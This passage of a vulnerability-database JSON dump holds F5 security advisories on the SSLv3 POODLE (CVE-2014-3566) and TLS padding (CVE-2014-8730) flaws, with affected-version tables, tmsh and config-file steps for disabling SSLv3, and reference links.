- 4.5.0 | None | REST API \n \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | Configuration utility \n4.0.0 - 4.5.0 | None | REST API \n \nBIG-IQ ADC | 4.5.0 | None | Configuration utility \n4.5.0 | None | REST API \n \nBIG-IQ Centralized Management | None | 5.0.0 \n4.6.0 | None \n \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | None \n \nF5 iWorkflow | None | 2.0.0 | None \n \nLineRate | 2.2.0 - 2.4.1 \n1.6.0 - 1.6.4 | None | SSL profiles \n \n* SSL profiles that contain the default cipher string (DEFAULT) do not allow SSLv3 connections and are not vulnerable to this CVE. However, if you have modified the **Ciphers** setting for the profile to allow SSLv3, then connections to the virtual server are vulnerable. For information about verifying whether SSLv3 is enabled for the profile, refer to the **Vulnerability Recommended Actions** section.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [BIG-IP, BIG-IQ, and Enterprise Manager](<https://support.f5.com/csp/article/K15702#bigip>)\n * [FirePass](<https://support.f5.com/csp/article/K15702#firepass>)\n * [ARX](<https://support.f5.com/csp/article/K15702#arx>)\n * [LineRate](<https://support.f5.com/csp/article/K15702#linerate>)\n\n**BIG-IP, BIG-IQ, and Enterprise Manager**\n\nSSL profiles\n\nTo mitigate this vulnerability in the SSL profile for the BIG-IP system, you can disable the SSLv3 protocol in the SSL profile by adding **!SSLv3** to the cipher string. For details about how to add this, refer to the following articles:\n\n * [K13171: Configuring the cipher strength for SSL profiles (11.x)](<https://support.f5.com/csp/article/K13171>)\n * [K7815: Configuring the cipher strength for SSL profiles (9.x - 10.x)](<https://support.f5.com/csp/article/K7815>)\n\nConfiguration utility\n\nTo mitigate this vulnerability for the Configuration utility, use the following options:\n\nBIG-IP 11.5.0 - 11.6.1\n\nFor BIG-IP 11.5.0 through 11.6.1, you can disable the SSLv3 protocol for the Configuration utility by performing the following procedure:\n\n**Note**: Feature enhancements allowing the use of this procedure have also been included in the following software versions: 11.4.1 HF6, 11.4.0 HF9, 11.2.1 HF13, and 10.2.4 HF10.\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. Disable SSLv3 (and SSLv2) by typing the following command: \n\nmodify /sys httpd ssl-protocol \"all -SSLv2 -SSLv3\"\n\n 3. Save the configuration by typing the following command: \n\nsave /sys config\n\nAll BIG-IP versions\n\nFor all BIG-IP versions, F5 recommends that you expose the management access only on trusted networks.\n\nBIG-IQ 4.4.0 and later\n\nFor BIG-IQ 4.4.0 and later, you can disable the SSLv3 protocol for the Configuration utility by performing the following procedure:\n\n**Impact of procedure**: This procedure restarts the **webd** process and temporarily disrupts traffic to the BIG-IQ system. You should perform this procedure during a maintenance window.\n\n 1. Log in to the BIG-IQ command line.\n 2. Back up a copy of the **/etc/webd/webd.conf** file by typing the following command: \n\ncp -p /etc/webd/webd.conf /var/tmp/webd.conf.sol15702\n\n 3. Edit the **/etc/webd/webd.conf** file using a text editor of your choice.\n 4. Locate the following line in the **/etc/webd/webd.conf** file: \n\nssl_protocols SSLv2 SSLv3 TLSv1 TLSv1.1 TLSv1.2;\n\n 5. Remove SSLv2 and SSLv3 from this line. After removal, this line should appear as follows: \n\nssl_protocols TLSv1 TLSv1.1 TLSv1.2;\n\n 6. Save the changes and exit the text editor.\n 7. Restart the **webd** process by typing the following command: \n\ntmsh restart sys service webd\n\n**FirePass**\n\n**Disabling SSLv3 for all FirePass interfaces**\n\n**Impact of procedure**: This procedure restarts services and prevents some connections to the FirePass system. You should perform this procedure during a maintenance window.\n\n 1. Log in to the FirePass Administrator interface.\n 2. Navigate to **Device Management** >** Security** > **User Access Security**.\n 3. Under **SSL Protocol Versions**, click **Accept only TLS protocol** **(incompatible with some browsers)**.\n 4. Under **SSL Ciphers Policy Enforcement**, select the **Reject SSL connection when a non-compliant cipher is used by the client browser **check box.\n 5. To restart services, click \"**click *here* to restart FirePass Services**.\"\n 6. Click **Restart**.\n\n**ARX**\n\nChanging the ARX Manager GUI cipher string (6.2.0 and later)\n\nTo disable SSLv3 for the ARX Manager GUI, perform the following procedure:\n\n**Impact of procedure:** Disabling SSLv3 may prevent some connections to the ARX Manager GUI.\n\n 1. Log in to the ARX Manager GUI.\n 2. Expand **Maintenance**.\n 3. Select **Certificates**.\n 4. Click the tab for **SSL Ciphers**.\n 5. Deselect all SSL ciphers.\n\n**LineRate**\n\nTo mitigate this vulnerability in the SSL profile for the LineRate system, you can disable the SSLv3 protocol in the SSL profile by pre-pending **!SSLv3** to the cipher-list. For details about how to add this, refer to the following article:\n\n * [CVE-2014-3566: Removing SSLv3 from LineRate](<https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-linerate>)\n\n**Note**: A DevCentral login is required to access this content.\n\n * [K15882: TLS1.x padding vulnerability CVE-2014-8730](<https://support.f5.com/csp/article/K15882>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K10942: Installing OPSWAT hotfixes on BIG-IP APM systems](<https://support.f5.com/csp/article/K10942>)\n**Note**: A DevCentral login is required to access the following content.\n\n * [CVE-2014-3566 POODLE vs CVE-2014-8730 TLS POODLE](<https://devcentral.f5.com/articles/cve-2014-3566-poodle-vs-cve-2014-8730-tls-poodle>)\n * [CVE-2014-3566: Removing SSLv3 from BIG-IP](<https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-big-ip>)\n * [iRule to stop SSLv3 connections](<https://devcentral.f5.com/articles/irule-to-stop-sslv3-connections>)\n * [POODLE and TLS_FALLBACK_SCSV deep dive](<https://devcentral.f5.com/articles/poodle-and-tlsfallbackscsv-deep-dive>)\n * [SSLv3 POODLE mitigation recommendations](<https://devcentral.f5.com/articles/sslv3-poodle-recommendations>)\n", "reporter": "f5", "published": "2014-10-15T05:15:00", "title": "SSLv3 vulnerability CVE-2014-3566", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-3566", "CVE-2014-8730"], "modified": "2017-09-18T21:31:00", "href": "https://support.f5.com/csp/article/K15702", "id": "F5:K15702", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-03T05:27:54", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.comhttps://devcentral.f5.com/articles/sslv3-poodle-recommendations", "https://support.f5.comhttps://devcentral.f5.com/articles/poodle-and-tlsfallbackscsv-deep-dive", "https://support.f5.comhttps://devcentral.f5.com/articles/irule-to-stop-sslv3-connections", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/10000/900/sol10942.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.comhttps://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-big-ip", "https://support.f5.com/kb/en-us/solutions/public/15000/800/sol15882.html", "https://support.f5.comhttps://devcentral.f5.com/articles/cve-2014-3566-poodle-vs-cve-2014-8730-tls-poodle", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * BIG-IP, BIG-IQ, and Enterprise Manager\n * FirePass\n * ARX\n * LineRate\n\n**BIG-IP, BIG-IQ, and Enterprise Manager**\n\nSSL profiles\n\nTo mitigate this vulnerability in the SSL profile for the BIG-IP system, you can\u00c2 disable the SSLv3 protocol in the SSL profile by adding **!SSLv3** to the cipher string. For details about how to add this, refer to the following articles:\n\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL7815: Configuring the cipher strength for SSL profiles (9.x - 10.x)\n\nConfiguration utility\n\nTo mitigate this vulnerability for the Configuration utility use the following options:\n\nBIG-IP 11.5.0 \u00e2\u0080\u0093 11.6.0\n\nFor BIG-IP 11.5.0 \u00e2\u0080\u0093 11.6.0, you can disable the SSLv3 protocol for the Configuration utility by performing the following procedure:\n\n**Note**: Feature enhancements allowing the use of this procedure have also been included in the following software versions: 11.4.1 HF6, 11.4.0 HF9, 11.2.1 HF13, and 10.2.4 HF10.\n\n 1. Log in to the\u00c2 Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. Disable SSLv3 (and SSLv2) by typing the following command: \n\nmodify /sys httpd ssl-protocol \"all -SSLv2 -SSLv3\"\n\n 3. Save the configuration by typing the following command: \n\nsave /sys config\n\nAll BIG-IP versions\n\nFor all BIG-IP versions, F5 recommends that you expose the management access only on trusted networks.\n\nBIG-IQ 4.4.0 and later\n\nFor BIG-IQ 4.4.0 and later, you can disable the SSLv3 protocol for the Configuration utility by performing the following procedure:\n\n**Impact of procedure**: This procedure will restart the **webd** process and temporarily disrupt traffic to the BIG-IQ system. You should perform this procedure during a maintenance window.\n\n 1. Log in to the BIG-IQ command line.\n 2. Back up a copy of the **/etc/webd/webd.conf** file by typing the following command: \n\ncp -p /etc/webd/webd.conf /var/tmp/webd.conf.sol15702\n\n 3. Edit the **/etc/webd/webd.conf** file using a text editor of your choice.\n 4. Locate the following line in the **/etc/webd/webd.conf** file: \n\nssl_protocols SSLv2 SSLv3 TLSv1 TLSv1.1 TLSv1.2;\n\n 5. Remove SSLv2 and SSLv3 from this line. After removal, this line should appear as follows: \n\nssl_protocols TLSv1 TLSv1.1 TLSv1.2;\n\n 6. Save the changes and exit the text editor.\n 7. Restart the **webd** process by typing the following command: \n\ntmsh restart sys service webd\n\n**FirePass**\n\n**Disabling SSLv3 for all FirePass interfaces**\n\n**Impact of procedure**: This procedure will restart services and prevent some connections to the FirePass system.\u00c2 You should perform this procedure during a maintenance window.\n\n 1. Log in to the FirePass Administrator interface.\n 2. Navigate to **Device Management** >** Security** > **User Access Security**.\n 3. Under\u00c2 **SSL Protocol Versions** click **Accept only TLS protocol** **(incompatible with some browsers)**.\n 4. Under **SSL Ciphers Policy Enforcement**, select the **Reject SSL connection when a non-compliant cipher is used by the client browser **check box.\n 5. To restart services, click \"**click *here* to restart FirePass Services**.\"\n 6. Click **Restart**.\n\n**ARX**\n\n**Changing the ARX Manager GUI cipher string (6.2.0 and later)**\n\nTo disable SSLv3 for the ARX Manager GUI, perform the following procedure:\n\n**Impact of procedure:** Disabling SSLv3 may prevent some connections to the ARX Manager GUI.\n\n 1. Log in to the ARX Manager GUI.\n 2. Expand **Maintenance**.\n 3. Select **Certificates**.\n 4. Click the tab for **SSL Ciphers**.\n 5. Deselect all SSL ciphers.\n\n**LineRate**\n\nTo mitigate this vulnerability in the SSL profile for the LineRate system, you can disable the SSLv3 protocol in the SSL profile by pre-pending **!SSLv3** to the cipher-list. For details about how to add this, refer to the following article:\n\n * [CVE-2014-3566: Removing SSLv3 from LineRate](<https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-linerate>)\n\n**Note**: A DevCentral login is required to access this content.\n\nSupplemental Information\n\n * SOL15882: TLS1.x padding vulnerability CVE-2014-8730\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL10942: Installing OPSWAT hotfixes on BIG-IP APM systems\n**Note**: A DevCentral login is required to access the following content.\n\n * [CVE-2014-3566 POODLE vs CVE-2014-8730 TLS POODLE](<https://devcentral.f5.com/articles/cve-2014-3566-poodle-vs-cve-2014-8730-tls-poodle>)\n * [CVE-2014-3566: Removing SSLv3 from BIG-IP](<https://devcentral.f5.com/articles/cve-2014-3566-removing-sslv3-from-big-ip>)\n * [iRule to stop SSLv3 connections](<https://devcentral.f5.com/articles/irule-to-stop-sslv3-connections>)\n * [POODLE and TLS_FALLBACK_SCSV deep dive](<https://devcentral.f5.com/articles/poodle-and-tlsfallbackscsv-deep-dive>)\n * [SSLv3 POODLE mitigation recommendations](<https://devcentral.f5.com/articles/sslv3-poodle-recommendations>)\n", "reporter": "f5", "published": "2014-10-14T00:00:00", "title": "SOL15702 - SSLv3 vulnerability CVE-2014-3566", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP PSM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "11.6.0", "operator": "le"}, {"name": "11.0.0 - 11.6.0\t\t\t10.0.0 - 10.2.4", "version": "12.0.0", "operator": "le"}, {"name": "11.0.0 - 11.6.0\t\t\t10.0.0 - 10.2.4", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IQ Device", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "11.6.0", "operator": "le"}, {"name": "Enterprise Manager", "version": "3.1.1", "operator": "le"}, {"name": "11.3.0 - 11.6.0", "version": "12.0.0", "operator": "le"}, {"name": "11.3.0 - 11.6.0", "version": "12.0.0", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.4.1", "operator": "le"}, {"name": "11.0.0 - 11.6.0", "version": "12.0.0", "operator": "le"}, {"name": "FirePass", "version": "6.1.0", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "\u00c2\u00a0", "version": "\u00c2", "operator": "le"}, {"name": "11.4.0 - 11.6.0", "version": "12.0.0", "operator": "le"}, {"name": "FirePass", "version": "7.0.0", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "11.4.1", "operator": "le"}, {"name": "11.0.0 - 11.6.0\t\t\t10.1.0 - 10.2.4", "version": "12.0.0", "operator": "le"}, {"name": "Enterprise Manager", "version": "2.3.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4\u00c2", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.4.1", "operator": "le"}, {"name": "LineRate", "version": "2.4.1", "operator": "le"}, {"name": "BIG-IP Link Controller", "version": "10.2.4", "operator": "le"}, {"name": "LineRate", "version": "1.6.4", "operator": "le"}, {"name": "BIG-IQ Cloud", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IQ Security", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP GTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IQ ADC", "version": "4.5.0", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "ARX", "version": "6.4.0", "operator": "le"}, {"name": "BIG-IP ASM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.4.1", "operator": "le"}], "cvelist": ["CVE-2014-3566", "CVE-2014-8730"], "modified": "2016-07-29T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/700/sol15702.html", "id": "SOL15702", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-03T05:27:45", "references": ["https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13123.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/9000/500/sol9502.html", "https://support.f5.com/kb/en-us/solutions/public/7000/800/sol7815.html", "https://support.f5.com/kb/en-us/solutions/public/15000/700/sol15702.html", "https://support.f5.com/kb/en-us/solutions/public/10000/000/sol10025.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.comhttps://devcentral.f5.com/articles/cve-2014-3566-poodle-vs-cve-2014-8730-tls-poodle", "https://support.f5.com/kb/en-us/solutions/public/13000/100/sol13171.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "2 If you are planning to upgrade to BIG-IP APM 11.4.1 HF6 or 11.5.1 HF6 to mitigate this issue, you should instead upgrade to 11.4.1 HF7 or 11.5.1 HF7 to avoid an issue specific to BIG-IP APM.\u00c2 For more information, refer to SOL15914:\u00c2 The TMM process may restart and produce a core file after BIG-IP APM systems are upgraded.\u00c2 \u00c2 \u00c2 \n\n**Note**: Testing tools for SSL/TLS may report false positives for BIG-IP 10.2.4 HF10 and 11.2.1 HF13 due to an issue being tracked in ID 500688. While these versions have been patched and contain the code fix for CVE-2014-8730, certain test tools may still report a false positive. This reason for this is because the BIG-IP system silently terminates the connection instead of responding with a **bad_record_mac** alert. Therefore, certain test tools erroneously report a false positive because the connection times out and the tools do not receive a **bad_record_mac** alert.\n\nVulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 is responding to this vulnerability as determined by the parameters defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nTo mitigate this vulnerability, you can configure a custom cipher string for the SSL profile and associate the profile with the virtual servers. To do so, perform one of the following procedures:\n\n**BIG-IP SSL profiles**\n\nTo mitigate this vulnerability, you can create a custom cipher string for the SSL profile that uses RC4 or AES-GCM ciphers. For details about how to add this, refer to the following procedures:\n\nBIG-IP 11.5.0 and later \n\n\nIn BIG-IP 11.5.0 and later, you can create a custom cipher string for the SSL profile using the AES-GCM:RC4-SHA ciphers. To do so, perform the following procedure: \n\n\n**Impact of procedure:** Clients that do not support the AES-GCM or RC4-SHA ciphers will fail to establish a connection to the virtual server. RC4 ciphers are not FIPS compliant.\n\n 1. Log in to the Traffic Management Shell (**tmsh**)** **by typing the following command:\n\ntmsh\n\n 2. Create a custom SSL profile that specifies the AES-GCM:RC4-SHA ciphers by using the following syntax:\n\ncreate /ltm profile <client-ssl / server-ssl> <profile_name> ciphers !SSLv3:AES-GCM:RC4-SHA\n\nFor example, the following command creates a custom client SSL profile called TLS-Padding:\n\ncreate /ltm profile client-ssl TLS-Padding ciphers !SSLv3:AES-GCM:RC4-SHA\n\n 3. Save the configuration by typing the following command:\n\nsave /sys config\n\n 4. Associate the SSL profile with the virtual servers.\n\nBIG-IP 10.x - 11.4.1 \n\n\nIn BIG-IP 10.x - 11.4.1, you can create a custom cipher string for the SSL profile using the RC4-SHA ciphers. To do so, perform the following procedure: \n\n\n**Impact of procedure:** Clients that do not support the RC4-SHA cipher will fail to establish a connection to the virtual server. RC4 ciphers are not FIPS compliant.\n\n 1. Log in to the Traffic Management Shell (**tmsh**)** **by typing the following command: \n\n\ntmsh\n\n 2. Create a custom SSL profile that specifies the RC4-SHA ciphers by using the following syntax:\n\ncreate /ltm profile <client-ssl / server-ssl> <profile_name> ciphers !SSLv3:RC4-SHA\n\nFor example, the following command creates a custom client SSL profile called TLS-Padding:\n\ncreate /ltm profile client-ssl TLS-Padding ciphers !SSLv3:RC4-SHA\n\n 3. Save the configuration by typing the following command:\n\nsave /sys config\n\n 4. Associate the SSL profile with the virtual servers.\n\nSupplemental Information\n\n * [CVE-2014-3566 POODLE vs CVE-2014-8730 TLS POODLE](<https://devcentral.f5.com/articles/cve-2014-3566-poodle-vs-cve-2014-8730-tls-poodle>)** \n \nNote**: A DevCentral login is required to access this content.\n * SOL15702: SSLv3 vulnerability CVE-2014-3566 \n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n * SOL10025: Managing BIG-IP product hotfixes (10.x)\n * SOL9502: BIG-IP hotfix matrix\n * SOL13171: Configuring the cipher strength for SSL profiles (11.x)\n * SOL7815: Configuring the cipher strength for SSL profiles (9.x - 10.x)\n", "reporter": "f5", "published": "2014-12-08T00:00:00", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "SOL15882 - TLS1.x padding vulnerability CVE-2014-8730", "bulletinFamily": "software", "affectedSoftware": [{"name": "BIG-IP ASM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP PSM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP PEM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP APM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP APM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IP AAM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP LTM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP PSM", "version": "11.4.1", "operator": "le"}, {"name": "BIG-IP ASM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP WebAccelerator", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IQ Security", "version": "4.4.0", "operator": "le"}, {"name": "BIG-IQ Cloud", "version": "4.4.0", "operator": "le"}, {"name": "BIG-IP Edge Gateway", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP Analytics", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP WOM", "version": "10.2.4", "operator": "le"}, {"name": "BIG-IP AFM", "version": "11.5.1", "operator": "le"}, {"name": "BIG-IP WOM", "version": "11.3.0", "operator": "le"}, {"name": "BIG-IQ Device", "version": "4.4.0", "operator": "le"}, {"name": "BIG-IP LTM", "version": "11.5.1", "operator": "le"}], "cvelist": ["CVE-2014-3566", "CVE-2014-8730"], "modified": "2016-06-28T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/800/sol15882.html", "id": "SOL15882", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-06-27T20:18:43", "references": [], "edition": 1, "description": "\nF5 Product Development has assigned IDs 451218, 450804, and 454465 (BIG-IP), IDs 494328, 494330, and 494331 (BIG-IQ), and IDs 494339, 494341, and 494342 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H495027 on the **Diagnostics** >** Identified **> **High **screen.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.5.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.0 \n11.6.0 - 11.6.1 \n11.5.2 - 11.5.4 \n11.5.1 HF6 \n11.5.0 HF6 \n11.4.1 HF6 \n11.4.0 HF9 \n11.2.1 HF13 \n10.2.4 HF10| SSL profiles \nBIG-IP AAM| 11.4.0 - 11.5.1| 12.0.0 - 12.1.0 \n11.6.0 - 11.6.1 \n11.5.2 - 11.5.4 \n11.5.1 HF6 \n11.5.0 HF6 \n11.4.1 HF6 \n11.4.0 HF9| SSL profiles \nBIG-IP AFM| 11.3.0 - 11.5.1| 12.0.0 - 12.1.0 \n11.6.0 - 11.6.1 \n11.5.2 - 11.5.4 \n11.5.1 HF6 \n11.5.0 HF6 \n11.4.1 HF6 \n11.4.0 HF9| SSL profiles \nBIG-IP Analytics| 11.0.0 - 11.5.1| 12.0.0 - 12.1.0 \n11.6.0 - 11.6.1 \n11.5.2 - 11.5.4 \n11.5.1 HF6 \n11.5.0 HF6 \n11.4.1 HF6 \n11.4.0 HF9 \n11.2.1 HF13| SSL profiles \nBIG-IP APM| 11.0.0 - 11.5.1 \n10.1.0 - 10.2.4| 12.0.0 - 12.1.0 \n11.6.0 - 11.6.1 \n11.5.2 - 11.5.4 \n11.5.1 HF6 2 \n11.5.0 HF6 \n11.4.1 HF6 2 \n11.4.0 HF9 \n11.2.1 HF13 \n10.2.4 HF10| SSL profiles \nBIG-IP ASM| 11.0.0 - 11.5.1 \n10.0.0 - 10.2.4| 12.0.0 - 12.1.0 \n11.6.0 - 11.6.1 \n11.5.2 - 11.5.4 \n11.5.1 HF6 \n11.5.0 HF6 \n11.4.1 HF6 \n11.4.0 HF9 \n11.2.1 HF13 \n10.2.4 HF10| SSL profiles \nBIG-IP DNS1| None| 12.0.0 - 12.1.0| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| 11.2.1 HF13 \n10.2.4 HF10| SSL profiles \nBIG-IP GTM1| None| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| None \nBIG-IP Link Controller1| None| 12.0.0 - 12.1.0 \n11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| None \nBIG-IP PEM| 11.3.0 - 11.5.1| 12.0.0 - 12.1.0 \n11.6.0 - 11.6.1 \n11.5.2 - 11.5.4 \n11.5.1 HF6 \n11.5.0 HF6 \n11.4.1 HF6 \n11.4.0 HF9| SSL profiles \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| 11.4.1 HF6 \n11.4.0 HF9 \n11.2.1 HF13 \n10.2.4 HF10| SSL profiles \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| 11.2.1 HF13 \n10.2.4 HF10| SSL profiles \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| 11.2.1 HF13 \n10.2.4 HF10| SSL profiles \nARX| None| 6.0.0 - 6.4.0| None \nEnterprise Manager1| None| 3.0.0 - 3.1.1 \n2.1.0 - 2.3.0| None \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| None \nBIG-IQ Cloud| 4.0.0 - 4.4.0| 4.4.0 HF2 \n4.5.0| REST API \nBIG-IQ Device| 4.2.0 - 4.4.0| 4.4.0 HF2 \n4.5.0| REST API \nBIG-IQ Security| 4.0.0 - 4.4.0| 4.4.0 HF2 \n4.5.0| REST API \nLineRate| None| 2.2.0 - 2.5.0 \n1.6.0 - 1.6.4| None \n \n1 The noted products contain vulnerable code but do not expose Secure Sockets Layer (SSL) profiles and are therefore not vulnerable.\n\n2 If you plan to upgrade to BIG-IP APM 11.4.1 HF6 or 11.5.1 HF6 to mitigate this issue, you should instead upgrade to 11.4.1 HF7 or 11.5.1 HF7 to avoid an issue specific to BIG-IP APM. For more information, refer to [K15914: The TMM process may restart and produce a core file after BIG-IP APM systems are upgraded](<https://support.f5.com/csp/article/K15914>). \n\n**Note**: Testing tools for SSL/TLS may report false positives for BIG-IP 10.2.4 HF10 and 11.2.1 HF13 due to an issue being tracked in ID 500688. While these versions have been patched and contain the code fix for CVE-2014-8730, certain test tools may still report a false positive. This occurs because the BIG-IP system silently terminates the connection instead of responding with a **bad_record_mac** alert. Therefore, certain test tools erroneously report a false positive because the connection times out and the tools do not receive a **bad_record_mac** alert.\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you can configure a custom cipher string for the SSL profile and associate the profile with the virtual servers. To do so, perform one of the following procedures:\n\nBIG-IP SSL profiles\n\nTo mitigate this vulnerability, you can create a custom cipher string for the SSL profile that uses RC4 or AES-GCM ciphers.\n\nBIG-IP 11.5.0 and later\n\nIn BIG-IP 11.5.0 and later, you can create a custom cipher string for the SSL profile using the AES-GCM:RC4-SHA ciphers. To do so, perform the following procedure:\n\n**Impact of procedure:** Clients that do not support the AES-GCM or RC4-SHA ciphers will fail to establish a connection to the virtual server. RC4 ciphers are not FIPS compliant.\n\n 1. Log in to the Traffic Management Shell (**tmsh**)** **by typing the following command: \n\ntmsh\n\n 2. Create a custom SSL profile that specifies the AES-GCM:RC4-SHA ciphers by using the following syntax: \n\ncreate /ltm profile <client-ssl / server-ssl> <profile_name> ciphers !SSLv3:!ADH:AES-GCM:RC4-SHA\n\nFor example, the following command creates a custom client SSL profile named TLS-Padding:\n\ncreate /ltm profile client-ssl TLS-Padding ciphers !SSLv3:!ADH:AES-GCM:RC4-SHA\n\n 3. Save the configuration by typing the following command: \n\nsave /sys config\n\n 4. Associate the SSL profile with the virtual servers.\n\nBIG-IP 10.x - 11.4.1\n\nIn BIG-IP 10.x 